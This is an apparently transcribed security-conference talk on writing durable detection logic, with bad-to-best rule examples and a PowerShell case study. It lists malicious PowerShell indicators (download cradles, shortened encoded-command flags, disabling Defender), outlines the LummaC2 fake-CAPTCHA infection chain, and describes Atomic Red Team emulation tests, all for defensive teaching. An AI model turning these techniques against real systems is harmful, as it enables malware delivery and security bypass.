
Welcome to Detections and Dragons: crafting logic that scales. As a very large disclaimer, I've never played D&D. I don't really know what it is, I'm so sorry, so a lot of the puns we're going to have in here may be completely off. I know that there is something called a dungeon master. Maybe. Yes. And I know the game is very long and a lot of people played it through COVID. But this session is all about the craft of building detection logic that doesn't just work once but stands the test of time, as threats evolve and as systems scale. Like any good quest (there's the first one, right?), we're facing some challenges along the way, so we're going
to talk about messy detection patterns, navigating confusing signals, and forging rules that actually give our analysts investigative leads instead of overwhelming them. Whether you're a seasoned detection wizard (again, see, playing off of that) or still earning your first log-parsing spell, this session is meant to give you the tools, examples, and ideas to build detection logic that's smarter, stronger, and battle-tested. I am Mac. I'm a retired detection engineer; I've been in cybersecurity as a security engineer since 2015, and as of two months ago I'm now a product manager. It's a very different world out there for me right now. And as a fun fact, I run
marathons in my spare time. And I'm Rachel Schwock. I'm also a retired detection engineer. I was a detection engineer for several years at Rick Pener and recently moved over to be a sales engineer in the past four months. So I know I've got sales in my title; hopefully that doesn't make anybody leave. I did come up with the name, because I was reading Fourth Wing. I like dragons, I like dragon books, and the best thing for "detection logic" to rhyme with was a D&D theme. So that's why we even made the theme, right? And dragons are cool. So, yeah, no complaints. All right. So, this is the agenda of what we're going to be talking about. We
have the dungeon of challenges: what are the hidden threats that can slip past our defenses, and what are some challenges we face while creating detection analytics? Then we have the art of the blade: what makes detection logic truly effective? We're going to go over bad, better, best when it comes to detection analytics: what makes a good detection analytic versus what's probably not going to work so well. Then we're going to look at spellbooks and strategy: how do we build lasting, resilient logic? We'll talk about principles, where to start, where you go from there, and what that process looks like. Which leads us into our battle map, where we're going to have a real-world
example we'll take you through, all the way until we give some example logic that you can implement within your own environment. And after that we're going to look at the training grounds, which is the testing and validation: how you can do it, why it's beneficial, and why it's never-ending. All right. So this slide highlights some of the most common and frustrating challenges that we encounter. First, you have alert deja vu: receiving the same alert repetitively. It's like being stuck in a loop, over and over again. Many of us have been swamped by the same repeated alerts, making it impossible to see what truly matters. It's a major drain on your focus and your resources
as a detection engineer or an analyst. It really sucks. Then we have false quests: receiving an alert that leads down a rabbit hole and takes a significant amount of time. It's basically a misleading map. These alerts look like a critical threat; you spend a lot of time on them and they lead you to absolutely nothing, diverting all of your attention. Then we have the late reveal. It's like finding the dragon's lair after it's already burnt down your village, right? It's the worst-case scenario: detection logic that fails to identify threats before there's an actual impact. And finally, shiny object syndrome. That is focusing your logic and your worry on the newest zero-day when you're
not really equipped to even handle the tried-and-true methods of threat delivery and execution. We can sometimes get so focused on the latest, most sophisticated threats that we overlook attack methods that are still highly effective and widely used, because we always want to chase the coolest, newest thing. These monsters represent the common pitfalls that can render our detection logic ineffective, so we have to understand them before we can discuss how to forge better defenses. All right, so now we're turning our attention to the art of crafting truly, quote unquote, "good" detection logic. Think of it as forging a legendary spell. Just like a well-documented spell, our detection
logic has to be transparent and easy to understand. You don't want your analysts guessing what you were trying to uncover and what the logic is actually detecting on. That really matters for someone who, let's say, specializes in endpoint and is now looking at a cloud detection analytic; you want them to be able to understand what that analytic was looking for in the first place. It also has to be reliable. Good detection logic accurately identifies threats without false positives. It's precise, it's trustworthy, and it's not a constant source of noise. And like a well-crafted spell, it should be resilient. Good detection logic minimizes the need for constant tweaking. You'll hear Rachel talk about
a rule of thumb for exclusions: you should only have maybe around five exclusions on any detection analytic. You don't want to keep having to add tweaks and exceptions; you need that time for more strategic tasks. And finally, it has to be well scoped, which is in the same realm. It's not broad, it's not an untargeted net; it's designed with a clear understanding of what it's looking for and what it's meant to detect, and it achieves that goal effectively. All right. So now I'm going to go over sharpening the blade. We're going to go over bad, better, best examples from the detection world. So, example number one. Oh, I know part of that was cut
off. So, say you want to beef up your business email compromise detection logic. Okay. I'm going to start with what I've historically found to be bad logic: "a user created an email rule." It is easy to read, I'll give it that; it passes that check. Is it reliable, though? Is it really that rare for people to create email rules? I've found it's not rare, surprisingly. There are a lot of people who are fanatics about email rules. You might have a smaller environment where you can get away with an email rule not being made daily, so it's not that big of a lift, but do you really want to see every time somebody makes an email rule to move emails from the co-workers they don't like to the junk folder? I mean, maybe for a little bit, right? But it might start to wear on your analysts over time. So let's narrow it down a little bit more: "a user created an email rule to move emails to the archive folder." The archive folder isn't used a whole lot, and the same goes for the conversation history folder and the RSS feeds folder. These are folders that see some use, but you can count on it not being a daily occurrence. Adversaries know that these are folders that aren't viewed a lot, so they utilize them to remain undetected by their victim. But you're still probably going to have to keep adding exclusions. There are people who, even in this day and age, are using RSS feeds. It's surprising, I know. The archive folder, too. So I've found the best logic, something that's really well scoped, also takes the email rule name into account. Adversaries like to name their rules unsuspiciously: you'll see things like "...", or an exclamation point, or maybe "aaa", something repetitive or just not well defined. So: an email rule with a name of maybe one to three characters was created to move items to the archive folder. That's going to be your highest-fidelity logic for detecting something evil.
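That bad/better/best progression can be sketched in code. This is a minimal sketch only: the event fields (`rule_name`, `destination_folder`) and the known-good list are assumptions, not any specific email product's schema.

```python
# Sketch of the "best" BEC logic above: a short, throwaway-looking rule name
# plus a rarely-viewed destination folder. Field names are hypothetical.

HIDDEN_FOLDERS = {"archive", "rss feeds", "conversation history"}
KNOWN_GOOD_NAMES = {"ooo"}  # e.g. a legitimate out-of-office rule

def suspicious_inbox_rule(event):
    name = event["rule_name"].strip().lower()
    return (event["destination_folder"].lower() in HIDDEN_FOLDERS
            and 1 <= len(name) <= 3          # "...", "!", "aaa", etc.
            and name not in KNOWN_GOOD_NAMES)
```

With this shape, a rule named "..." or "aaa" moving mail to Archive fires, while a legitimate "OOO" rule or a descriptively named rule does not.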
The only thing you might have to exclude is something like "OOO" for out-of-office, if somebody uses that. But this is one where, every time I see it, I'm looking at it and taking it seriously. The next example I want to go over is process behavior: scheduled tasks. They're a really good persistence mechanism, but they're also used legitimately by software and admins. Backup jobs might use scheduled tasks, for example, so it's definitely not something you want an alert for every time you see a scheduled task running. That would get exhausting. A better case is looking at schtasks.exe with a command line that contains /create; you can kind of see it down there. Now you're looking at the times somebody makes a scheduled task, or maybe new software is installed and it's creating a scheduled task. There are still going to be exclusions you have to keep up with; it's not going to be super quiet. So, even better: it's probably not going to be common for software to create a scheduled task that makes a PowerShell script or a command prompt command run. The best here is schtasks.exe with /create where (I know you can't really see it) the command line also contains "cmd" or "powershell". Your analyst would get this alert and be able to easily know what's going on: a scheduled task was created and it's running whoami, nltest /domain_trusts, or something similar, and they're going to go, "why would that run repetitively?" That's an immediate indicator, and they're not wasting their time figuring out what some piece of software is. So that's your best bet for good logic there.
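The scheduled-task progression can be sketched the same way. A rough sketch only, keyed off the command-line string; real logic should also check the process image and handle quoting, and the alert-level labels are my own shorthand, not any product's.

```python
def sched_task_alert_level(cmdline: str) -> str:
    """Rate a schtasks.exe command line per the bad/better/best logic above."""
    cmd = cmdline.lower()
    if "/create" not in cmd:
        return "ignore"          # "bad" would alert on every task run
    if "cmd" in cmd or "powershell" in cmd:
        return "best: alert"     # task created that launches a shell
    return "better: review"      # task creation alone, noisier
```

For example, `schtasks /create /tn Updater /tr "powershell -enc ..."` lands in the "best" bucket, while a backup product creating a task that runs its own binary only lands in "better".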
All right, so now it's time to move from theory to practice. We're diving into detection strategy: the overarching plan for how we build, how we deploy, and how we maintain our defenses. This is where we move beyond individual threat actors into an overall approach to detection analytics. All right. So this is the MITRE ATT&CK framework. Now that we're focused on our overall battle plan, this is going to be a critical tool for us. Instead of facing the unknown, we can leverage this globally recognized knowledge base to understand how attackers operate. It's not just a theoretical model, it's a practical guide. It gives us an understanding of the adversary's perspective: it maps out the stages of the attack lifecycle and the specific techniques at every stage, and it even gives you examples, so we can anticipate an attack or a threat before it occurs. We can also prioritize our detection efforts using this. The framework can help us focus on the most prevalent and impactful techniques that we're seeing, ensuring that you're not just chasing shadows. We can also build more targeted and effective logic: instead of just writing generic rules, we can craft detection logic that focuses on a specific TTP, anywhere from initial access all the way through the lifecycle into reconnaissance, persistence, and so on. It also allows us to speak a common language. When you're trying to talk to other people in the industry, or to other teams, you can more reasonably explain your coverage: this is where
we're covered, and this is where we have gaps. It helps us talk about our detection capabilities. In essence, the MITRE ATT&CK framework empowers us to move from reactive to proactive defense: threat hunting, detection, and so on. By aligning our detection logic with this framework, we can strategically build defenses against known attacks and techniques. All right, so we're going to start with choosing your detection strategy. First, fortify the gates early. This seems like a pretty reasonable concept, right? You want to catch it before any impact occurs, as early as possible during the initial stages of an attack, before any major damage is caused. Earlier detection means easier cleanup. Second, we have beware the most abused. This is about focusing on what attackers are actually using and avoiding that shiny object syndrome. And third, we have seek out the hidden weaknesses. This part of the detection strategy asks us to look at our own environment and our own history. Are you constantly dealing with the same type of problem? Is it account compromise? If so, that's okay, but maybe you need to strengthen that area: look at those tactics and techniques and create detection analytics over what is prevalent in your organization. In short, we need to think strategically
about when we detect (initial access, persistence, and so on), what attack methods we prioritize for our industry, and where our persistent weaknesses lie. Then we can make smarter choices about how to build detection logic and defend against the threats that pose the greatest risk to our organizations. All right, this slide. Oh, good, it's on there all the way. Perfect. There are two slides coming up: this one, research technique abuse, and then another one that extends it. You can take a picture of this; later on we'll have a resource page, but we could not list them all on there. So it's a great time to take a picture if you want to remember some things. Now that we've talked strategy, we want to talk about how you can actually learn your enemy's moves, your attacker's moves. The next two slides are resources for researching how attackers pull off their attacks. It's kind of like the reconnaissance of the blue team, that intelligence-gathering phase. We've already talked about MITRE ATT&CK; it's not just a list, but, for every technique, examples of how it's used, how to stop it, and how to detect it. It's like our central intelligence database. Then, depending on your accent: I say "LOL-boss," Rachel says "LOL-bahs." That's LOLBAS. I just found that
out; that's all I wanted to say. Honestly, I always want to say it the other way. And you'll notice I like to spell the whole thing out: Living Off the Land Binaries and Scripts. This is a great resource because it focuses on how attackers abuse normal Windows tools, things like PowerShell, which we're going to go into detail on with our example. By understanding how these everyday tools can be used maliciously, you can obviously up your defenses against them. We'll go into more detail about Atomic Red Team later, but an important phase is testing and validation. That's where things get hands-on: Atomic Red Team gives us small, testable examples that map directly to MITRE ATT&CK, so we can run tests in our environment and not only see if our logic is working, but also identify gaps where we need to strengthen our defenses. Then, building on that research toolkit, we have detection.fyi and detect.fyi. Think of these as your go-to blogs for the latest in threat detection. They're in-depth, engineering-focused articles on how to build effective detections, a constant feed of practical knowledge from the detection community, from each and every one of your peers. And then we have the one where I say "DFIR" and Rachel says "defer, defer, defer": The DFIR Report. If you want to see real-world
attacks broken down step by step, think of it as being on the front lines of the news: you get all the in-depth details of these attacks being played out in the wild. And finally, we have the Red Canary Threat Detection Report. It comes out yearly, and it's basically all the top threats seen over the past year: trending techniques, trending threats. It gives you not only information on the execution but also, at the very bottom, actual detection analytics that you can go implement within your own environment, and I think that's a pretty cool resource to utilize. So now let's explore detection opportunities as the next phase. Think of it as scouting the battlefield in your own environment. First we have choose your weapons wisely. This reminds us that the tools and logs we use, our spellbook, really matter. We need to select the right data sources that are going to help us out. Then we have craft your strategy. Before we even start looking, we need a clear idea of what we're hunting for. What do you want to detect? What specific threats are we trying to find? We need a well-defined strategy to keep us focused. And then we have think like the guardians. Our detection logic is not just for machines; it's for our
analysts, our detection engineers, our security engineers. We need to build detections that are actionable and very clear, so that our DEs, or whatever you call them within your own organization, actually have the means to begin an investigation. And fourth, we have survey the battleground. We need to know our own environment inside and out. Where are your critical assets? Where are the potential entry points for attackers? Where are the weaknesses? Understanding your environment helps you figure out where you need to strengthen. And finally, beware of false alarms. We need to start thinking right away about the obvious exclusions, things we know are normal but might trigger some of these detection analytics. For your analysts' and detection engineers' sanity, please do this. So, when we're exploring detection opportunities: choose the right data, define what we're looking for, consider the analyst's perspective, understand your environment, and minimize noise. Those are our guiding principles for effective detection analytics. All right. Now I'm going to go into an actual example. I wanted to choose PowerShell, because PowerShell is tough. It's used by admins and adversaries alike, so it can be a beast to create coverage on, and I don't think you're ever actually done creating coverage on PowerShell. So it's an interesting one. Why is PowerShell so beloved by admins and adversaries? Well, it's a
powerful tool. It's great for automation, it's native to Windows, and there are a lot of scripts already out there for admins to use, so it makes their jobs really easy. It also makes adversaries' jobs really easy, and they like it for the same reasons. They can count on PowerShell being on every machine, they love that it's easy to obfuscate commands, and it's not like it's really going to stand out. PowerShell running might not raise a red flag, whereas having to rely on somebody downloading a random binary off the internet might raise a little more concern. So it really helps them lay low. They can also run fileless attacks, interact with the registry to add persistence that way, and run payloads in memory as well. The opportunities are really endless here. But like I said, PowerShell is tough. It's not something where you can say, "Hey, I want to be secure, I'm just going to block PowerShell," and expect it to go super well. You could try it; let me know. It might break some things, though, because Microsoft loves PowerShell. So we're going to have to think about what we can use to differentiate malicious from benign. What does malicious PowerShell look like? So, let's say we did our research. We
used the techniques in the blogs that Mac mentioned. Here are a few items we came back with; there's going to be another slide too, because there are several. Obfuscated or encoded commands. This one's tough, because admins use obfuscation a lot too, just so they don't have to worry about escape characters. So Base64 is not malicious on its own; you can't use that alone as an indicator. But the -EncodedCommand flag, when it's shortened, is a little weirder. A lot of those prebuilt admin scripts will have the whole -EncodedCommand spelled out; an adversary might use -e, -ec, or -enc. So that's one indicator you can keep in your back pocket. You'll probably still have to do a little bit of work on that one, depending on your environment, but it's a good one to start with. Suspicious network activity: PowerShell downloading payloads from the internet. Keep an eye out for Invoke-WebRequest and Invoke-Expression (also known as IEX), or the use of Net.WebClient. You'll usually see "http" in that command line as well, and that's also something you can use to narrow down malicious behavior. Using memory streams: this is another one. PowerShell creates new objects with memory streams, often used to decompress and execute payloads in memory, and you'd see New-Object IO.MemoryStream in the command line. You might not know exactly what's going on behind the scenes, but that in the command line gives you an idea that they're trying to run something in memory. Persistence: PowerShell being used to create scheduled tasks, or creating registry entries with reg add. Look for the Windows Run keys; that's pretty basic for that activity. Bypassing security controls: you can disable security tools, it's built in, and it's really easy for attackers. Think bypassing AMSI, or using Set-MpPreference with DisableRealtimeMonitoring set to true, which will let them bypass Defender.
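To see why the shortened `-enc` flag matters, note what it carries: `-EncodedCommand` payloads are just Base64 over UTF-16LE text, so an analyst or an enrichment step can decode them back to the real command. A quick sketch; the sample command and URL are made up for illustration.

```python
import base64

def decode_encoded_command(b64: str) -> str:
    """PowerShell -EncodedCommand payloads are Base64 over UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")

# Build a sample the way an attacker would, i.e. the equivalent of
# [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cmd))
hidden = "IEX (iwr http://example.test/p.ps1)"
sample = base64.b64encode(hidden.encode("utf-16-le")).decode()

print(decode_encoded_command(sample))  # surfaces the hidden download cradle
```

Decoding in your pipeline turns an opaque blob into something your existing command-line logic (IEX, IWR, http, and so on) can match against.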
Unusual execution: PowerShell running from an unexpected parent process. I'll talk about this one a little bit more; MSHTA is a really good example of a process that shouldn't be spawning PowerShell. Let's talk about what threats are using PowerShell. Obviously, there's a ton; I couldn't fit the whole list on the slide, and it's kind of never-ending. It's a tried-and-true method, but a trending one that's really interesting lately is LummaC2. I'll dive into what that execution looks like, but it's a malware-as-a-service stealer capable of delivering additional payloads via .exe, DLL, or PowerShell. It's been seen a lot lately in fake CAPTCHA lures, which is what we're going to go over. It's a really interesting one; I love it. SocGholish is another one. It leverages drive-by downloads masquerading as software updates. It'll usually send a person to a browser update page that says, "hey, you have to update Chrome right now to continue," and they'll download that file, and it is not a browser update. It will use PowerShell a lot for additional downloads and discovery commands. So that's just a few here: Cobalt Strike, Empire, PowerSploit, and Mimikatz is down there as well. Tried and true; Invoke-Mimikatz is a good PowerShell one to watch for. All right, LummaC2 execution. I think it
all actually made it onto this one, so, cool. This is one example of it. LummaC2 can be delivered by a lot of different malware, but this is one I've seen a lot of recently. A user will go to a fake CAPTCHA page, and CAPTCHAs have gotten kind of ridiculous: you might have to solve a puzzle, select all the bicycles and buses. So I get why this lure works; people are tired of these challenges and they're like, "whatever it takes," right? So it tells them, "you need to copy and paste this into your Windows Run box," and they do it. They won't really even see the command; the page obfuscates it a little, showing something like "CAPTCHA verification" where they're looking when they press paste, and then they hit enter. That spawns mshta.exe, which reaches out to that malicious page and retrieves an encoded PowerShell script. That script then pulls down additional remote resources; in this example it wrote them to the temp folder. Then process injection occurs, or DLL sideloading. And this is an interesting thing to try to detect, because one good way to look at process injection is a process running without the command line it normally has while making network connections. So if a process that doesn't normally make network connections to external resources starts calling out to random, weird websites, that's a good sign of process injection. PowerShell is used a lot for process injection too, and it's a good one to watch because PowerShell can often run without a command line. Something to keep in mind. But this chain will end with direct exfiltration to the C2. Okay. So we did our research; we picked out what malicious looks like and what threats are using it. Here are just a few detection ideas from
that. So we've got the process powershell.exe with a command line that includes shortened command switches: -nop for NoProfile, or -noni for NonInteractive, or Invoke-Expression (IEX) or IWR, plus "http". If it has any of those plus the "http" in there, a download is likely occurring. That would at least give your analyst a good starting point to ask, "okay, what website is it downloading from?" And you're probably going to have to exclude Chocolatey, because, man, Chocolatey, that's how you download it. So, you know, a couple of exclusions right off the bat; I know there will be for that one. The next one is the command line including the shortened encoded command: -e, -ec, or -enc, with spaces before and after so you can see it really is the shortened version of -EncodedCommand. And then we've got mshta.exe with a child process of powershell.exe. Now is the time to refine your logic: run those logic ideas through your environment and see if there are just a few things that need excluding right off the bat. If the exclusions are never-ending, it's honestly not worth detecting, or you need to find something else to add into the logic. With PowerShell and MSHTA, for example, maybe you need to add the fact that there is a network connection as well.
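Those three ideas can be sketched as simple predicates over process events. The event fields (`process`, `parent`, `cmdline`) are assumptions, not any particular EDR's schema, and the string matching is deliberately naive; real logic would tokenize the command line properly.

```python
import re

def likely_download_cradle(event):
    """PowerShell with shortened switches or a download alias, plus http."""
    cmd = event["cmdline"].lower()
    return (event["process"] == "powershell.exe"
            and "http" in cmd
            and any(tok in cmd for tok in ("-nop", "-noni", "iex", "iwr")))

def shortened_encoded_command(event):
    """-e/-ec/-enc with surrounding spaces, i.e. not the full -EncodedCommand."""
    return (event["process"] == "powershell.exe"
            and re.search(r"\s-e(c|nc)?\s", event["cmdline"], re.IGNORECASE) is not None)

def mshta_spawning_powershell(event):
    return event["parent"] == "mshta.exe" and event["process"] == "powershell.exe"
```

Note the whitespace anchors in the regex: they are what separates the shortened flags from a fully spelled-out `-EncodedCommand`, which tends to be the admin-script pattern.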
Just something to further define it and narrow the scope. Because if you have an alert that fires every day, then when it does detect something real, you will just disregard it. You're like, "oh, this again, close them. That again, I don't care." So focus on creating logic that has value, because otherwise, when it does try to tell you something, you're not going to care. Trust me, I've done it before too. And now we're going to go over testing with Atomic Red Team; that's the website, atomicredteam.io. This is a really valuable tool. What is it? It is an open-source library of tests mapped to MITRE ATT&CK. The tests are very focused and have minimal dependencies. They're called atomics, and they just have prerequisites, the actual test command, and cleanup commands. It emulates common threat techniques, and I really like that it's mapped to MITRE and that anyone can contribute to it. So there are a lot of tests, because the whole security community has found it to be a valuable resource and continuously updates it. Why use Atomic Red Team? Well, even taking a step back: as a security analyst, you trust that your tools and systems will alert you to various behaviors, and sometimes it feels like you're really having to trust them blindly. It's a common experience, and one I've had, where you fully expect that, like, "oh yeah, that tool, it'll
block that, it'll alert me at least, right?" And then it doesn't, and you find out way later, when things have gotten a lot worse, and you're like, "what the heck happened here? I thought we could catch that." Well, this is one way you can really test in real time: would I see this? Would my tool detect it? Am I going to get any alerts at all? You're setting yourself up for success if you're able to imitate the bad guy before the bad guy can do it in your environment. It's the best-case scenario if you just go ahead and run some tests. It also makes sure that the detection logic you made doesn't have typos and is working how you expected, because it happens: you might think it's going to work one way, you run a test, and it didn't fire. Go back and figure it out. It can also help you create detection logic: say you just go to Atomic Red Team, look at the various techniques, go to one, and read about it; it'll tell you why the test does what it does. And you can evaluate your coverage and your coverage gaps with those tests. It's also a really good learning
tool. It lets anyone learn: why would an adversary do this? What would they do? It really helps you get that attacker mindset, and I think that levels you up as a defender. There are multiple paths you can use to get started with Atomic Red Team, and it's really easy. You can run tests on a technique-by-technique basis, which is really useful when you're making detection logic that ties to a specific technique: go through and run those tests. You can also find a specific threat you want to emulate and pick out tests that share its techniques. Like I mentioned with LummaC2, you can go to MSHTA, go to PowerShell, and run the different tests associated with those. And you can also decide whether to manually paste and run the commands, or use Invoke-AtomicRedTeam, a PowerShell module (hey, PowerShell again), which runs those tests automatically: you type Invoke-AtomicTest and the technique, and it'll run all the tests associated with that technique. So, going back to our PowerShell example: I did have to modify the tests a bit so they fit on my slides, so use that as an example of modifying the tests on Atomic Red Team to fit your needs; you don't have to use exactly what they publish. That first one is Invoke-Expression and a download: PowerShell running, calling Net.WebClient, and calling out to an example URL. That's a good indicator of an attempted download, and a good, harmless test to run. Then you've got the -ec flag running "Hello World": PowerShell with -NoProfile, -ec, and some Base64, another harmless test to run. And then we've got MSHTA spawning PowerShell. This one's kind of lengthy, but it's MSHTA that ends up using VBScript/WScript to run PowerShell, which writes out a hello message to show it worked. Use these tests with whatever detection logic you're building, and modify them to fit your needs.
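To tie the testing back to the logic, the three slide tests and the earlier detection ideas can be wired together in a tiny replay harness. Everything here is illustrative: the events are hand-built stand-ins for the atomic tests (the Base64 string is a made-up fragment), and the field names are assumptions rather than any tool's real telemetry schema.

```python
import re

# Toy events modeled loosely on the three slide tests.
events = [
    {"parent": "explorer.exe", "process": "powershell.exe",
     "cmdline": "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://example.test/a.ps1')"},
    {"parent": "explorer.exe", "process": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -ec SQBFAFgA"},
    {"parent": "mshta.exe", "process": "powershell.exe",
     "cmdline": "powershell.exe -c Write-Host 'hello from mshta'"},
]

rules = {
    "download_cradle": lambda e: e["process"] == "powershell.exe"
        and "http" in e["cmdline"].lower()
        and any(t in e["cmdline"].lower() for t in ("iex", "iwr", "-nop", "-noni")),
    "short_encoded_cmd": lambda e: e["process"] == "powershell.exe"
        and re.search(r"\s-e(c|nc)?\s", e["cmdline"], re.IGNORECASE) is not None,
    "mshta_parent": lambda e: e["parent"] == "mshta.exe" and e["process"] == "powershell.exe",
}

for i, event in enumerate(events):
    fired = [name for name, rule in rules.items() if rule(event)]
    print(f"event {i}: {fired or 'MISSED -- coverage gap'}")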
whatever detection logic take it out as an example on atomic red team. How to modify tests to fit your needs. All right. And now for another part another crucial step putting that logic to the test writing. Um as we mentioned atomic routine is great. We need to ask ourselves key questions after any test. First you need to ask yourself what triggered. Review the alerts, the logs, the telemetry generated. What do you see? We need to meticulously review the alerts to see was our logic the source of the signal. Did anything else unexpectingly fire that now we need to go and evaluate. Then you need to ask is it what you expected? Did our detection logic behave
the way that you intended? Did it catch the right behavior, or did it miss it? Do we need to go in and do more? Were there any surprises? Did you notice, okay, we saw this part of the life cycle, this part of the execution chain, but we missed this other part? We need to somehow raise that telemetry up in case the attack is performed in a different way, right? Because most of the threat actors that we see are performing similar aspects of attacks, similar methods of persistence or recon, and we want to have multiple detection analytics along the way to make sure that we're not missing any part of that. And third, we need to
identify new ideas or improvements. Did our testing reveal any alternative attacker behaviors that we now need to cover? Are there any refinements we need to make: additional tuning, better filtering, logic expansion to make our detection analytics even more effective? And then the pivotal part of this whole thing is rinse and repeat. Testing isn't a one-time thing. We need to adjust our logic and our thresholds based on our findings, then retest with slight variations and scenarios, and keep iterating until our detection logic is reliable and ready to scale. So in the training grounds, we're constantly asking: what happened, was it right, and how can we make it better? This iterative process of testing and
refinement is essential for building truly robust detection logic. All right. And then, if you're taking away anything, these are our three key takeaways from this talk. First, scaling starts with intentional design. Good detection logic is not just clever; it's clear, it's testable, and it's built with context in mind. We want to give our analysts, or whoever is reviewing the alerts or events that come up, the means to begin an investigation: a clear, actionable ability to respond to what your detection logic is bubbling up to the surface. Second, balance precision and coverage like a true dungeon master. Again, knowing I have absolutely no idea what that is in D&D, but you want to avoid the trap
of overfitting or over-alerting. Know your environment specifically: what are your users typically doing? What's normal? What's not? Detection quality isn't about catching just the bad stuff; it's about catching what matters, right? What will you be able to use to mitigate, to respond, to act? And finally, test like a threat actor and review like an analyst. Validation is your best feedback loop. Don't just ask, "Did my detection logic fire?" Ask, "Did it teach me anything about what's going on in my environment or how threat actors are operating?" Every round of testing is an opportunity to refine your detection logic, make it bigger and better, and continue making sure that we're catching it
early. And finally, again, like I said, this is not a full list of the resources, but it is some of them: the Red Canary Threat Detection Report that's already out for the year, which will give you a lot of detection analytics you can tailor to whatever SIEM tools you're using in your own environment, again with more details on the execution chain and all of that; Atomic Red Team, for writing and running the tests; the LOLBAS project; and the MITRE ATT&CK framework. All right, we have time for questions if anyone has any. Yes? So the question is: are there specific TTPs that we had a hard time scaling?
There are. I mean, there are actually ones that we don't have coverage for. Let me go to the map, actually. No, no, that's a good question. I mean, there are some where the false positives, like Rachel kind of stated, you just can't work around. Yeah. You get really close. So I guess where I would have a hard time: we really focus a lot on the behaviors after an attack has started. So if you're talking about something like exploiting a public-facing application, I wouldn't have a lot of insight until after the exploitation occurred. So that's one that I've definitely found challenging with the EDR data that I'm usually basing my detectors on. Any other questions?
All right. All right. Well, thank you.
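The three PowerShell test patterns walked through earlier (the Invoke-Expression download cradle, the -NoProfile -enc Base64 invocation, and MSHTA spawning PowerShell) could be sketched as detection logic roughly like this. This is a minimal Python illustration over a hypothetical process-event schema (process_name, parent_name, command_line), not the speakers' actual production rules:

```python
# Illustrative sketch only: flag the three Atomic-Red-Team-style PowerShell
# behaviors discussed in the talk, against a hypothetical event schema.
import re

def detect(event):
    """Return the list of detection names that match a single process event."""
    hits = []
    proc = event.get("process_name", "").lower()
    parent = event.get("parent_name", "").lower()
    cmd = event.get("command_line", "")

    # 1) Download cradle: Invoke-Expression (iex) plus Net.WebClient.
    if (proc == "powershell.exe"
            and re.search(r"(?i)\b(iex|invoke-expression)\b", cmd)
            and re.search(r"(?i)net\.webclient", cmd)):
        hits.append("powershell_download_cradle")

    # 2) Encoded command: -e / -enc / -EncodedCommand, often with -NoProfile.
    if proc == "powershell.exe" and re.search(r"(?i)-e(nc|ncodedcommand)?\b", cmd):
        hits.append("powershell_encoded_command")

    # 3) Proxy execution: MSHTA (via VBScript/WScript) spawning PowerShell.
    if proc == "powershell.exe" and parent == "mshta.exe":
        hits.append("mshta_spawned_powershell")

    return hits
```

Tuning the second rule is where the "know your environment" takeaway bites: in a shop where admins legitimately use encoded commands, you would add filtering on parent process or user context rather than alert on every `-enc`.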